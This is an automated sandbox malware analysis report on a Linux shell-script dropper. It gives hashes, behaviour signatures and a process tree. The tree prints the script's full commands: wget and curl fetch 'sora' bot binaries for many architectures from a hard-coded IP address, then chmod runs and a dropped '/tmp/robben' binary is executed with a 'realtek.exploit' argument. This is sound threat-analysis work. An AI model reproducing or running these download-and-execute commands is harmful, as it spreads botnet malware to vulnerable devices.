Analysis
max time kernel: 32s
max time network: 60s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 18/10/2024, 02:36
Static task: static1
Behavioral task: behavioral1
  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
  Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
  Resource: debian9-mipsel-20240611-en
General
Target: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Size: 2KB
MD5: 2a963ff4fb99086ab454f4f26acf8b74
SHA1: 0830412185a29f4230a85d8f6eb4d15f2a165aea
SHA256: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
SHA512: 7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  837   chmod
  849   chmod
  877   chmod
  744   chmod
  750   chmod
  756   chmod
  774   chmod
  807   chmod
  843   chmod
  733   chmod
  762   chmod
  791   chmod
  827   chmod
  860   chmod
Executes dropped EXE (14 IoCs)
  ioc           pid   Process
  /tmp/robben   735   robben
  /tmp/robben   745   robben
  /tmp/robben   751   robben
  /tmp/robben   757   robben
  /tmp/robben   763   robben
  /tmp/robben   775   robben
  /tmp/robben   793   robben
  /tmp/robben   809   robben
  /tmp/robben   829   robben
  /tmp/robben   838   robben
  /tmp/robben   844   robben
  /tmp/robben   850   robben
  /tmp/robben   861   robben
  /tmp/robben   879   robben
Reads runtime system information (14 IoCs)
  description               ioc                             Process
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  (the same entry is recorded 14 times, once for each curl invocation in the process tree)
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid   Process
  737   wget
  740   curl
  743   cat
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description                    ioc           Process
  File opened for modification   /tmp/robben   bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes
Process tree from the behavioral run. The level-1 entry is the submitted script; the indented entries are its level-2 child processes, each shown as "binary path: command line [PID]" followed by the signatures it triggered.

/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh: /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh [PID 707]
  - Writes file to tmp directory

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86 [PID 715]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86 [PID 722]
    - Reads runtime system information
  /bin/cat: cat sora.x86 [PID 732]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 733]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 735]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mips [PID 737]
    - System Network Configuration Discovery
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mips [PID 740]
    - Reads runtime system information
    - System Network Configuration Discovery
  /bin/cat: cat sora.mips [PID 743]
    - System Network Configuration Discovery
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 744]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 745]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86_64 [PID 747]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86_64 [PID 748]
    - Reads runtime system information
  /bin/cat: cat sora.x86_64 [PID 749]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 750]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 751]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i468 [PID 753]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i468 [PID 754]
    - Reads runtime system information
  /bin/cat: cat sora.i468 [PID 755]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 756]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 757]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i686 [PID 759]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i686 [PID 760]
    - Reads runtime system information
  /bin/cat: cat sora.i686 [PID 761]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 762]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 763]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mpsl [PID 765]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mpsl [PID 766]
    - Reads runtime system information
  /bin/cat: cat sora.mpsl [PID 773]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 774]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 775]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm4 [PID 778]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm4 [PID 782]
    - Reads runtime system information
  /bin/cat: cat sora.arm4 [PID 789]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 791]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 793]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm5 [PID 795]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm5 [PID 798]
    - Reads runtime system information
  /bin/cat: cat sora.arm5 [PID 805]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 807]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 809]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm6 [PID 811]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm6 [PID 815]
    - Reads runtime system information
  /bin/cat: cat sora.arm6 [PID 825]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 827]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 829]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm7 [PID 832]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm7 [PID 834]
    - Reads runtime system information
  /bin/cat: cat sora.arm7 [PID 836]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 837]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 838]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc [PID 840]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc [PID 841]
    - Reads runtime system information
  /bin/cat: cat sora.ppc [PID 842]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 843]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 844]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc440fp [PID 846]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc440fp [PID 847]
    - Reads runtime system information
  /bin/cat: cat sora.ppc440fp [PID 848]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE [PID 849]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 850]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.m68k [PID 852]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.m68k [PID 853]
    - Reads runtime system information
  /bin/cat: cat sora.m68k [PID 859]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben [PID 860]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 861]
    - Executes dropped EXE

  /usr/bin/wget: wget http://93.123.85.141/bins/sora.sh4 [PID 864]
  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.sh4 [PID 868]
    - Reads runtime system information
  /bin/cat: cat sora.sh4 [PID 875]
  /bin/chmod: chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben [PID 877]
    - File and Directory Permissions Modification
  /tmp/robben: ./robben realtek.exploit [PID 879]
    - Executes dropped EXE